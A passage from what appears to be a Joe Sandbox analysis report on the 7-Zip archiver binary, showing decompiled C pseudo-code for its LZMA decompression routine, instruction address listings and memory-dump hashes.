							} while (_t988 >  *((intOrPtr*)(_t1151 + 0x310a0 + _t695 * 4)));
							 *(_t1153 + 0x80) = _t695;
							goto L99;
						}
						_t728 = _t694 - _t858;
						_t1140 = _t1151 + 0x6a0 + (_t858 + _t858 * 2 + _t858 + _t858 * 2) * 8;
						 *(_t1153 + 0x18) = _t858 + _t728;
						do {
							_t1140 = _t1140 + 0x30;
							_t728 = _t728 - 1;
							 *_t1140 = 0x40000000;
						} while (_t728 != 0);
						goto L95;
					}
					_t908 = 0;
					_t1122 = _t689;
					if(_t689 <=  *((intOrPtr*)(_t1151 + 0x310a0))) {
						L90:
						 *(_t1151 + 0x310a0 + _t908 * 4) = _t689;
						 *((intOrPtr*)(_t1153 + 0x38)) = _t908 + 2;
						goto L91;
					} else {
						goto L89;
					}
					do {
						L89:
						_t908 = _t908 + 2;
					} while (_t689 >  *(_t1151 + 0x310a0 + _t908 * 4));
					goto L90;
				}
			}








































































































































                                                                                                                                    0x00460e00
                                                                                                                                    0x00460e00
                                                                                                                                    0x00460e00
                                                                                                                                    0x00460e13
                                                                                                                                    0x00460e14
                                                                                                                                    0x00460e1a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00460e20
                                                                                                                                    0x00460e20
                                                                                                                                    0x00460e27
                                                                                                                                    0x00460e2e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00460e34
                                                                                                                                    0x00460e38
                                                                                                                                    0x00460e3f
                                                                                                                                    0x00460e53
                                                                                                                                    0x00460e57
                                                                                                                                    0x00460e5b
                                                                                                                                    0x00460e60
                                                                                                                                    0x00460e8c
                                                                                                                                    0x00460e9e
                                                                                                                                    0x00460ea9
                                                                                                                                    0x00460ead
                                                                                                                                    0x00460eb3
                                                                                                                                    0x00460eb9
                                                                                                                                    0x00460ec5
                                                                                                                                    0x00460ec9
                                                                                                                                    0x00460ecd
                                                                                                                                    0x00460ed4
                                                                                                                                    0x00460ed6
                                                                                                                                    0x00460ed8
                                                                                                                                    0x00460edd
                                                                                                                                    0x00460edf
                                                                                                                                    0x00460ee6
                                                                                                                                    0x00460ef0
                                                                                                                                    0x00460ef2
                                                                                                                                    0x00460ef2
                                                                                                                                    0x00460ef9
                                                                                                                                    0x00460efa
                                                                                                                                    0x00460efd
                                                                                                                                    0x00460f00
                                                                                                                                    0x00460f0d
                                                                                                                                    0x00460f0f
                                                                                                                                    0x00460f12
                                                                                                                                    0x00460f12
                                                                                                                                    0x00460f1c
                                                                                                                                    0x00460f20
                                                                                                                                    0x00460f20
                                                                                                                                    0x00460f23
                                                                                                                                    0x00460f25
                                                                                                                                    0x00460f2b
                                                                                                                                    0x00460f2d
                                                                                                                                    0x00460f2f
                                                                                                                                    0x00460f2f
                                                                                                                                    0x00460f35
                                                                                                                                    0x00460f39
                                                                                                                                    0x00460f53
                                                                                                                                    0x00460f58
                                                                                                                                    0x00460f5a
                                                                                                                                    0x00460f61
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00460f7d
                                                                                                                                    0x00460f88
                                                                                                                                    0x00460f9c
                                                                                                                                    0x00460fbf
                                                                                                                                    0x00460fc8
                                                                                                                                    0x00460fcf
                                                                                                                                    0x00460fea
                                                                                                                                    0x0046100f
                                                                                                                                    0x00461017
                                                                                                                                    0x00461026
                                                                                                                                    0x00461028
                                                                                                                                    0x00461046
                                                                                                                                    0x00461060
                                                                                                                                    0x00461068
                                                                                                                                    0x0046106c
                                                                                                                                    0x00461070
                                                                                                                                    0x00461076
                                                                                                                                    0x004610b0
                                                                                                                                    0x004610f1
                                                                                                                                    0x004610f3
                                                                                                                                    0x004610fc
                                                                                                                                    0x00461103
                                                                                                                                    0x00461105
                                                                                                                                    0x0046110b
                                                                                                                                    0x0046110f
                                                                                                                                    0x00461117
                                                                                                                                    0x00461121
                                                                                                                                    0x00461128
                                                                                                                                    0x0046112b
                                                                                                                                    0x0046112e
                                                                                                                                    0x0046112e
                                                                                                                                    0x00000000
                                                                                                                                    0x00461103
                                                                                                                                    0x00461084
                                                                                                                                    0x00461088
                                                                                                                                    0x0046108c
                                                                                                                                    0x00461090
                                                                                                                                    0x00461094
                                                                                                                                    0x004610a0
                                                                                                                                    0x004610a0
                                                                                                                                    0x004610a3
                                                                                                                                    0x004610a4
                                                                                                                                    0x004610a4
                                                                                                                                    0x004610ac
                                                                                                                                    0x00000000
                                                                                                                                    0x00460f3b
                                                                                                                                    0x00460f3f
                                                                                                                                    0x00460f42
                                                                                                                                    0x00460f44
                                                                                                                                    0x00460f4b
                                                                                                                                    0x00460f4c
                                                                                                                                    0x00460f51
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00460f51
                                                                                                                                    0x00000000
                                                                                                                                    0x00460f44
                                                                                                                                    0x00460f39
                                                                                                                                    0x00460e69
                                                                                                                                    0x00460e6d
                                                                                                                                    0x00460e74
                                                                                                                                    0x00460e80
                                                                                                                                    0x00460e80
                                                                                                                                    0x00460e83
                                                                                                                                    0x00460e84
                                                                                                                                    0x00460e84
                                                                                                                                    0x00000000
                                                                                                                                    0x00460e80
                                                                                                                                    0x00460e41
                                                                                                                                    0x00460e44
                                                                                                                                    0x00460e46
                                                                                                                                    0x00460e4d
                                                                                                                                    0x00460e4e
                                                                                                                                    0x00460e51
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00460e51
                                                                                                                                    0x00000000
                                                                                                                                    0x00461131
                                                                                                                                    0x00461138
                                                                                                                                    0x00461139
                                                                                                                                    0x00461143
                                                                                                                                    0x00460e00
                                                                                                                                    0x00460e00
                                                                                                                                    0x00460e00
                                                                                                                                    0x00460e13
                                                                                                                                    0x00460e14
                                                                                                                                    0x00460e1a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00460e1a
                                                                                                                                    0x00460e00
                                                                                                                                    0x00461149
                                                                                                                                    0x0046114d
                                                                                                                                    0x00461153
                                                                                                                                    0x0046117b
                                                                                                                                    0x0046117b
                                                                                                                                    0x00461181
                                                                                                                                    0x00461560
                                                                                                                                    0x00461560
                                                                                                                                    0x00461564
                                                                                                                                    0x00461565
                                                                                                                                    0x0046156d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00460877
                                                                                                                                    0x0046087c
                                                                                                                                    0x00460886
                                                                                                                                    0x00461579
                                                                                                                                    0x0046157f
                                                                                                                                    0x00461585
                                                                                                                                    0x0046159f
                                                                                                                                    0x0046088c
                                                                                                                                    0x0046088c
                                                                                                                                    0x00460890
                                                                                                                                    0x0046089a
                                                                                                                                    0x0046089d
                                                                                                                                    0x004608a4
                                                                                                                                    0x004608ab
                                                                                                                                    0x004608af
                                                                                                                                    0x00460910
                                                                                                                                    0x004608b1
                                                                                                                                    0x004608b1
                                                                                                                                    0x004608b9
                                                                                                                                    0x00460902
                                                                                                                                    0x004608bb
                                                                                                                                    0x004608cd
                                                                                                                                    0x004608d4
                                                                                                                                    0x004608ed
                                                                                                                                    0x004608d6
                                                                                                                                    0x004608dd
                                                                                                                                    0x004608dd
                                                                                                                                    0x004608d4
                                                                                                                                    0x004608b9
                                                                                                                                    0x0046091a
                                                                                                                                    0x00460947
                                                                                                                                    0x0046096e
                                                                                                                                    0x00460974
                                                                                                                                    0x0046097e
                                                                                                                                    0x00460994
                                                                                                                                    0x0046099b
                                                                                                                                    0x00000000
                                                                                                                                    0x0046099b
                                                                                                                                    0x00460987
                                                                                                                                    0x0046098b
                                                                                                                                    0x00000000
                                                                                                                                    0x00460952
                                                                                                                                    0x00460952
                                                                                                                                    0x00460958
                                                                                                                                    0x0046095e
                                                                                                                                    0x00460965
                                                                                                                                    0x004609a2
                                                                                                                                    0x004609a2
                                                                                                                                    0x004609a6
                                                                                                                                    0x004609ab
                                                                                                                                    0x004609b5
                                                                                                                                    0x004609f7
                                                                                                                                    0x004609fe
                                                                                                                                    0x00460a05
                                                                                                                                    0x00460a09
                                                                                                                                    0x00000000
                                                                                                                                    0x00460a09
                                                                                                                                    0x004609bb
                                                                                                                                    0x004609bf
                                                                                                                                    0x004609c6
                                                                                                                                    0x004609de
                                                                                                                                    0x004609ed
                                                                                                                                    0x004609ed
                                                                                                                                    0x00000000
                                                                                                                                    0x004609ed
                                                                                                                                    0x004609d7
                                                                                                                                    0x004609d7
                                                                                                                                    0x004609dc
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004609dc
                                                                                                                                    0x0046091c
                                                                                                                                    0x00460923
                                                                                                                                    0x0046093c
                                                                                                                                    0x00460925
                                                                                                                                    0x0046092c
                                                                                                                                    0x0046092c
                                                                                                                                    0x00460a0d
                                                                                                                                    0x00460a19
                                                                                                                                    0x00460a1d
                                                                                                                                    0x00460a27
                                                                                                                                    0x00460a33
                                                                                                                                    0x00460a39
                                                                                                                                    0x00460a3f
                                                                                                                                    0x00460a4b
                                                                                                                                    0x00460a4f
                                                                                                                                    0x00460a59
                                                                                                                                    0x00460a59
                                                                                                                                    0x00460a5e
                                                                                                                                    0x00460a67
                                                                                                                                    0x00460a6f
                                                                                                                                    0x00460a73
                                                                                                                                    0x00460a77
                                                                                                                                    0x00460a80
                                                                                                                                    0x00460a88
                                                                                                                                    0x00460a8f
                                                                                                                                    0x00460a91
                                                                                                                                    0x00460aab
                                                                                                                                    0x00460ab3
                                                                                                                                    0x00460ace
                                                                                                                                    0x00460ae2
                                                                                                                                    0x00460aeb
                                                                                                                                    0x00460b10
                                                                                                                                    0x00460b18
                                                                                                                                    0x00460b20
                                                                                                                                    0x00460b42
                                                                                                                                    0x00460b49
                                                                                                                                    0x00460b4b
                                                                                                                                    0x00460b4f
                                                                                                                                    0x00460b56
                                                                                                                                    0x00460b58
                                                                                                                                    0x00460b5c
                                                                                                                                    0x00460b5e
                                                                                                                                    0x00460b68
                                                                                                                                    0x00460b6a
                                                                                                                                    0x00460b74
                                                                                                                                    0x00460b7a
                                                                                                                                    0x00460b84
                                                                                                                                    0x00460b8e
                                                                                                                                    0x00460b8e
                                                                                                                                    0x00460b96
                                                                                                                                    0x00460bb9
                                                                                                                                    0x00460bcd
                                                                                                                                    0x00460bd1
                                                                                                                                    0x00460bd3
                                                                                                                                    0x00460bde
                                                                                                                                    0x00460be6
                                                                                                                                    0x00460c1d
                                                                                                                                    0x00460c25
                                                                                                                                    0x00460c27
                                                                                                                                    0x00460c2f
                                                                                                                                    0x00460c35
                                                                                                                                    0x00460c3b
                                                                                                                                    0x00460c41
                                                                                                                                    0x00460c41
                                                                                                                                    0x00460c25
                                                                                                                                    0x00460c49
                                                                                                                                    0x00460c54
                                                                                                                                    0x00460c56
                                                                                                                                    0x00460c5c
                                                                                                                                    0x00460c5e
                                                                                                                                    0x00460c60
                                                                                                                                    0x00460c60
                                                                                                                                    0x00460c67
                                                                                                                                    0x00000000
                                                                                                                                    0x00460c6d
                                                                                                                                    0x00460c6d
                                                                                                                                    0x00460c73
                                                                                                                                    0x00460c79
                                                                                                                                    0x00460c7b
                                                                                                                                    0x00460c7b
                                                                                                                                    0x00460c84
                                                                                                                                    0x00460de3
                                                                                                                                    0x00460de3
                                                                                                                                    0x00460deb
                                                                                                                                    0x00000000
                                                                                                                                    0x00460c9b
                                                                                                                                    0x00460c9b
                                                                                                                                    0x00460c9e
                                                                                                                                    0x00460ca0
                                                                                                                                    0x00460ca0
                                                                                                                                    0x00460ca2
                                                                                                                                    0x00460ca9
                                                                                                                                    0x00460cc5
                                                                                                                                    0x00460cc5
                                                                                                                                    0x00460cc5
                                                                                                                                    0x00460cc8
                                                                                                                                    0x00460cd2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00460cdc
                                                                                                                                    0x00460cf7
                                                                                                                                    0x00460d02
                                                                                                                                    0x00460d33
                                                                                                                                    0x00460d37
                                                                                                                                    0x00460d3b
                                                                                                                                    0x00460d3f
                                                                                                                                    0x00460d45
                                                                                                                                    0x00460d75
                                                                                                                                    0x00460db6
                                                                                                                                    0x00460db8
                                                                                                                                    0x00460dc1
                                                                                                                                    0x00460dc8
                                                                                                                                    0x00460dcf
                                                                                                                                    0x00460dd3
                                                                                                                                    0x00460dd6
                                                                                                                                    0x00460dd9
                                                                                                                                    0x00460de0
                                                                                                                                    0x00460de0
                                                                                                                                    0x00000000
                                                                                                                                    0x00460dc8
                                                                                                                                    0x00460d53
                                                                                                                                    0x00460d59
                                                                                                                                    0x00460d5d
                                                                                                                                    0x00460d61
                                                                                                                                    0x00460d65
                                                                                                                                    0x00460d65
                                                                                                                                    0x00460d68
                                                                                                                                    0x00460d69
                                                                                                                                    0x00460d69
                                                                                                                                    0x00460d71
                                                                                                                                    0x00000000
                                                                                                                                    0x00460cab
                                                                                                                                    0x00460cab
                                                                                                                                    0x00460cb3
                                                                                                                                    0x00460cb6
                                                                                                                                    0x00460cb8
                                                                                                                                    0x00460cbf
                                                                                                                                    0x00460cc0
                                                                                                                                    0x00460cc3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00460cc3
                                                                                                                                    0x00000000
                                                                                                                                    0x00460cb8
                                                                                                                                    0x00460ca9
                                                                                                                                    0x00460c84
                                                                                                                                    0x00460c67
                                                                                                                                    0x00460b01
                                                                                                                                    0x00000000
                                                                                                                                    0x00460b01
                                                                                                                                    0x0046091a
                                                                                                                                    0x00460886
                                                                                                                                    0x00000000
                                                                                                                                    0x00461573
                                                                                                                                    0x004611a5
                                                                                                                                    0x004611a9
                                                                                                                                    0x004611ac
                                                                                                                                    0x004611b2
                                                                                                                                    0x004611dc
                                                                                                                                    0x004611dc
                                                                                                                                    0x004611de
                                                                                                                                    0x004611eb
                                                                                                                                    0x00461203
                                                                                                                                    0x0046120a
                                                                                                                                    0x00461227
                                                                                                                                    0x0046122a
                                                                                                                                    0x00461239
                                                                                                                                    0x00461250
                                                                                                                                    0x0046125f
                                                                                                                                    0x00461266
                                                                                                                                    0x0046126c
                                                                                                                                    0x00461276
                                                                                                                                    0x0046127a
                                                                                                                                    0x0046127e
                                                                                                                                    0x00461281
                                                                                                                                    0x00461283
                                                                                                                                    0x00461283
                                                                                                                                    0x0046128d
                                                                                                                                    0x004612b7
                                                                                                                                    0x0046128f
                                                                                                                                    0x00461294
                                                                                                                                    0x00461294
                                                                                                                                    0x004612b9
                                                                                                                                    0x004612c0
                                                                                                                                    0x004612c2
                                                                                                                                    0x004612cc
                                                                                                                                    0x004612cf
                                                                                                                                    0x004612d1
                                                                                                                                    0x004612d1
                                                                                                                                    0x004612e9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004612ef
                                                                                                                                    0x004612f3
                                                                                                                                    0x004612ff
                                                                                                                                    0x00461301
                                                                                                                                    0x00461302
                                                                                                                                    0x00461306
                                                                                                                                    0x00461308
                                                                                                                                    0x00461308
                                                                                                                                    0x0046130c
                                                                                                                                    0x00461335
                                                                                                                                    0x0046133d
                                                                                                                                    0x0046133f
                                                                                                                                    0x00461346
                                                                                                                                    0x00461504
                                                                                                                                    0x0046150b
                                                                                                                                    0x0046150e
                                                                                                                                    0x00461519
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0046151b
                                                                                                                                    0x00461522
                                                                                                                                    0x0046152b
                                                                                                                                    0x0046154e
                                                                                                                                    0x0046154e
                                                                                                                                    0x00000000
                                                                                                                                    0x0046152b
                                                                                                                                    0x0046135f
                                                                                                                                    0x00461363
                                                                                                                                    0x00461367
                                                                                                                                    0x004613ae
                                                                                                                                    0x004613b7
                                                                                                                                    0x004613be
                                                                                                                                    0x004613de
                                                                                                                                    0x004613e9
                                                                                                                                    0x004613fc
                                                                                                                                    0x004613fe
                                                                                                                                    0x0046142e
                                                                                                                                    0x00461438
                                                                                                                                    0x0046143c
                                                                                                                                    0x00461440
                                                                                                                                    0x00461446
                                                                                                                                    0x00461480
                                                                                                                                    0x004614b7
                                                                                                                                    0x004614c5
                                                                                                                                    0x004614c7
                                                                                                                                    0x004614d0
                                                                                                                                    0x004614d7
                                                                                                                                    0x004614d9
                                                                                                                                    0x004614dd
                                                                                                                                    0x004614e2
                                                                                                                                    0x004614e9
                                                                                                                                    0x004614f4
                                                                                                                                    0x004614fb
                                                                                                                                    0x004614fe
                                                                                                                                    0x00461501
                                                                                                                                    0x00461501
                                                                                                                                    0x00000000
                                                                                                                                    0x004614d7
                                                                                                                                    0x00461454
                                                                                                                                    0x00461458
                                                                                                                                    0x0046145c
                                                                                                                                    0x00461460
                                                                                                                                    0x00461464
                                                                                                                                    0x00461470
                                                                                                                                    0x00461470
                                                                                                                                    0x00461473
                                                                                                                                    0x00461474
                                                                                                                                    0x00461474
                                                                                                                                    0x0046147c
                                                                                                                                    0x00000000
                                                                                                                                    0x0046130e
                                                                                                                                    0x00461312
                                                                                                                                    0x00461314
                                                                                                                                    0x00461317
                                                                                                                                    0x00461324
                                                                                                                                    0x0046132b
                                                                                                                                    0x0046132c
                                                                                                                                    0x0046132f
                                                                                                                                    0x00461320
                                                                                                                                    0x00000000
                                                                                                                                    0x00461320
                                                                                                                                    0x00000000
                                                                                                                                    0x0046132f
                                                                                                                                    0x00461331
                                                                                                                                    0x00000000
                                                                                                                                    0x00461331
                                                                                                                                    0x00461552
                                                                                                                                    0x00461552
                                                                                                                                    0x00461557
                                                                                                                                    0x0046155a
                                                                                                                                    0x0046126c
                                                                                                                                    0x00461276
                                                                                                                                    0x0046127a
                                                                                                                                    0x0046127e
                                                                                                                                    0x00461281
                                                                                                                                    0x00461283
                                                                                                                                    0x00461283
                                                                                                                                    0x0046128d
                                                                                                                                    0x004612b7
                                                                                                                                    0x0046128f
                                                                                                                                    0x00461294
                                                                                                                                    0x00461294
                                                                                                                                    0x004612b9
                                                                                                                                    0x004612c0
                                                                                                                                    0x004612c2
                                                                                                                                    0x004612cc
                                                                                                                                    0x004612cf
                                                                                                                                    0x004612d1
                                                                                                                                    0x004612d1
                                                                                                                                    0x004612e9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004612e9
                                                                                                                                    0x00461266
                                                                                                                                    0x004611f0
                                                                                                                                    0x004611f0
                                                                                                                                    0x004611f3
                                                                                                                                    0x004611fc
                                                                                                                                    0x00000000
                                                                                                                                    0x004611fc
                                                                                                                                    0x004611b9
                                                                                                                                    0x004611bd
                                                                                                                                    0x004611c4
                                                                                                                                    0x004611d0
                                                                                                                                    0x004611d0
                                                                                                                                    0x004611d3
                                                                                                                                    0x004611d4
                                                                                                                                    0x004611d4
                                                                                                                                    0x00000000
                                                                                                                                    0x004611d0
                                                                                                                                    0x00461155
                                                                                                                                    0x00461157
                                                                                                                                    0x0046115f
                                                                                                                                    0x0046116d
                                                                                                                                    0x0046116d
                                                                                                                                    0x00461177
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00461161
                                                                                                                                    0x00461161
                                                                                                                                    0x00461161
                                                                                                                                    0x00461164
                                                                                                                                    0x00000000
                                                                                                                                    0x00461161

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1f8fa4cdc9228aaa3a07012a4c32e0885d6804b09010c7afb976018d4f09c0f3
                                                                                                                                    • Instruction ID: 7147a41103b82fee1bf31e8f6f8380e5711e53636797ff3198694e8fe18354a8
                                                                                                                                    • Opcode Fuzzy Hash: 1f8fa4cdc9228aaa3a07012a4c32e0885d6804b09010c7afb976018d4f09c0f3
                                                                                                                                    • Instruction Fuzzy Hash: D332C1716082458FCB19CF18D4906AEB7E2FFD9308F148A2DE88A97310E739E955CF42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0045E0C0 Relevance: .5, Instructions: 481COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0045E0C0(void* __eax, signed int* __ecx) {
				intOrPtr _t149;
				unsigned int _t153;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;
				signed int _t160;
				signed int _t161;
				signed char* _t162;
				signed int _t164;
				intOrPtr _t167;
				signed int _t168;
				signed char* _t169;
				signed int _t171;
				signed char* _t179;
				signed int _t190;
				signed int _t192;
				signed int _t196;
				signed char* _t197;
				signed char* _t199;
				signed int _t204;
				signed short* _t205;
				void* _t206;
				signed int _t207;
				signed int _t215;
				signed int _t216;
				signed char* _t225;
				signed int _t228;
				signed int _t232;
				signed int _t235;
				signed int _t238;
				signed int _t241;
				signed int _t244;
				signed int _t247;
				signed char _t251;
				void* _t252;
				signed int _t265;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t278;
				signed char* _t279;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				unsigned int _t291;
				signed int* _t292;
				intOrPtr _t293;
				signed char* _t294;
				signed short* _t296;
				signed int _t297;
				signed int _t298;
				signed int _t300;
				signed int _t301;
				signed int _t310;
				signed int _t314;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed char* _t344;
				void* _t351;

				_t292 = __ecx;
				_t340 =  *(__ecx + 0x34);
				_t283 =  *(__ecx + 0x1c);
				_t321 =  *(__ecx + 0x20);
				_t149 =  *((intOrPtr*)(__ecx + 0x10));
				 *(_t351 + 0x10) =  &(( *(_t351 + 0x28))[__eax]);
				 *((intOrPtr*)(_t351 + 0x14)) = _t149;
				_t204 = (0x00000001 <<  *(__ecx + 8)) - 0x00000001 &  *(__ecx + 0x2c);
				 *(_t351 + 0x18) =  *(_t149 + ((_t340 << 4) + 1) * 2) & 0x0000ffff;
				if(_t283 >= 0x1000000) {
					L4:
					_t153 = (_t283 >> 0xb) *  *(_t351 + 0x18);
					if(_t321 >= _t153) {
						_t293 =  *((intOrPtr*)(_t351 + 0x14));
						_t225 =  *(_t351 + 0x28);
						_t284 = _t283 - _t153;
						_t322 = _t321 - _t153;
						 *(_t351 + 0x18) =  *(_t293 + 0x180 + _t340 * 2) & 0x0000ffff;
						if(_t284 >= 0x1000000) {
							L39:
							_t157 = (_t284 >> 0xb) *  *(_t351 + 0x18);
							if(_t322 >= _t157) {
								_t285 = _t284 - _t157;
								_t323 = _t322 - _t157;
								_t158 =  *(_t293 + 0x198 + _t340 * 2) & 0x0000ffff;
								 *(_t351 + 0x1c) = 3;
								if(_t285 >= 0x1000000) {
									L44:
									_t228 = (_t285 >> 0xb) * _t158;
									_t159 =  *((intOrPtr*)(_t351 + 0x14));
									if(_t323 >= _t228) {
										_t294 =  *(_t351 + 0x28);
										_t286 = _t285 - _t228;
										_t324 = _t323 - _t228;
										 *(_t351 + 0x18) =  *(_t159 + 0x1b0 + _t340 * 2) & 0x0000ffff;
										if(_t286 >= 0x1000000) {
											L55:
											_t232 = (_t286 >> 0xb) *  *(_t351 + 0x18);
											if(_t324 >= _t232) {
												_t160 =  *(_t159 + 0x1c8 + _t340 * 2) & 0x0000ffff;
												_t287 = _t286 - _t232;
												_t323 = _t324 - _t232;
												if(_t287 >= 0x1000000) {
													L60:
													_t235 = (_t287 >> 0xb) * _t160;
													if(_t323 >= _t235) {
														goto L62;
													} else {
														_t288 = _t235;
													}
													goto L63;
												} else {
													if(_t294 >=  *(_t351 + 0x10)) {
														goto L2;
													} else {
														_t287 = _t287 << 8;
														_t323 = _t323 << 0x00000008 |  *_t294 & 0x000000ff;
														 *(_t351 + 0x28) =  &(_t294[1]);
														goto L60;
													}
												}
											} else {
												_t288 = _t232;
												goto L63;
											}
										} else {
											if(_t294 >=  *(_t351 + 0x10)) {
												goto L2;
											} else {
												_t286 = _t286 << 8;
												_t324 = _t324 << 0x00000008 |  *_t294 & 0x000000ff;
												_t294 =  &(_t294[1]);
												 *(_t351 + 0x28) = _t294;
												goto L55;
											}
										}
									} else {
										_t314 =  *(_t159 + ((_t340 + 0xf << 4) + _t204) * 2) & 0x0000ffff;
										_t179 =  *(_t351 + 0x28);
										_t287 = _t228;
										if(_t228 >= 0x1000000) {
											L48:
											_t235 = (_t287 >> 0xb) * _t314;
											if(_t323 >= _t235) {
												L62:
												_t288 = _t287 - _t235;
												_t323 = _t323 - _t235;
												L63:
												_t225 =  *(_t351 + 0x28);
												 *(_t351 + 0x20) = 0xc;
												_t296 =  *((intOrPtr*)(_t351 + 0x14)) + 0xa68;
												goto L64;
											} else {
												if(_t235 >= 0x1000000 || _t179 <  *(_t351 + 0x10)) {
													return 3;
												} else {
													goto L2;
												}
											}
										} else {
											if(_t179 >=  *(_t351 + 0x10)) {
												goto L2;
											} else {
												_t287 = _t228 << 8;
												_t323 = _t323 << 0x00000008 |  *_t179 & 0x000000ff;
												_t179 =  &(_t179[1]);
												 *(_t351 + 0x28) = _t179;
												goto L48;
											}
										}
									}
								} else {
									if(_t225 >=  *(_t351 + 0x10)) {
										goto L2;
									} else {
										_t285 = _t285 << 8;
										_t323 = _t323 << 0x00000008 |  *_t225 & 0x000000ff;
										 *(_t351 + 0x28) =  &(_t225[1]);
										goto L44;
									}
								}
							} else {
								_t288 = _t157;
								 *(_t351 + 0x20) = 0;
								_t296 = _t293 + 0x664;
								 *(_t351 + 0x1c) = 2;
								L64:
								_t161 =  *_t296 & 0x0000ffff;
								if(_t288 >= 0x1000000) {
									L67:
									_t238 = (_t288 >> 0xb) * _t161;
									_t162 =  *(_t351 + 0x28);
									if(_t323 >= _t238) {
										_t341 = _t296[1] & 0x0000ffff;
										_t289 = _t288 - _t238;
										_t325 = _t323 - _t238;
										if(_t289 >= 0x1000000) {
											L72:
											_t241 = (_t289 >> 0xb) * _t341;
											if(_t325 >= _t241) {
												_t290 = _t289 - _t241;
												_t325 = _t325 - _t241;
												_t205 =  &(_t296[0x102]);
												_t342 = 0x10;
												 *(_t351 + 0x18) = 0x100;
											} else {
												_t342 = 8;
												_t290 = _t241;
												_t205 = _t296 + 0x104 + (_t204 + _t204) * 8;
												 *(_t351 + 0x18) = 8;
											}
											goto L75;
										} else {
											if(_t162 >=  *(_t351 + 0x10)) {
												goto L2;
											} else {
												_t289 = _t289 << 8;
												_t325 = _t325 << 0x00000008 |  *_t162 & 0x000000ff;
												_t162 =  &(_t162[1]);
												 *(_t351 + 0x28) = _t162;
												goto L72;
											}
										}
									} else {
										_t290 = _t238;
										_t205 = _t296 + 4 + (_t204 + _t204) * 8;
										_t342 = 0;
										 *(_t351 + 0x18) = 8;
										L75:
										_t297 = 1;
										L76:
										while(1) {
											if(_t290 >= 0x1000000) {
												L79:
												_t244 = (_t290 >> 0xb) * (_t205[_t297] & 0x0000ffff);
												if(_t325 >= _t244) {
													_t290 = _t290 - _t244;
													_t325 = _t325 - _t244;
													_t297 = _t297 + _t297 + 1;
												} else {
													_t290 = _t244;
													_t297 = _t297 + _t297;
												}
												_t164 =  *(_t351 + 0x18);
												if(_t297 >= _t164) {
													_t298 = _t297 + _t342 - _t164;
													if( *(_t351 + 0x20) >= 4) {
														goto L20;
													} else {
														if(_t298 >= 4) {
															_t298 = 3;
														}
														_t167 =  *((intOrPtr*)(_t351 + 0x14));
														_t344 =  *(_t351 + 0x28);
														_t128 = _t167 + 0x360; // 0x363
														_t206 = (_t298 << 7) + _t128;
														_t300 = 1;
														do {
															_t168 =  *(_t206 + _t300 * 2) & 0x0000ffff;
															if(_t290 >= 0x1000000) {
																goto L91;
															} else {
																if(_t344 >=  *(_t351 + 0x10)) {
																	goto L2;
																} else {
																	_t290 = _t290 << 8;
																	_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
																	_t344 =  &(_t344[1]);
																	goto L91;
																}
															}
															goto L113;
															L91:
															_t247 = (_t290 >> 0xb) * _t168;
															if(_t325 >= _t247) {
																_t290 = _t290 - _t247;
																_t325 = _t325 - _t247;
																_t300 = _t300 + _t300 + 1;
															} else {
																_t290 = _t247;
																_t300 = _t300 + _t300;
															}
														} while (_t300 < 0x40);
														_t301 = _t300 - 0x40;
														if(_t301 < 4) {
															goto L21;
														} else {
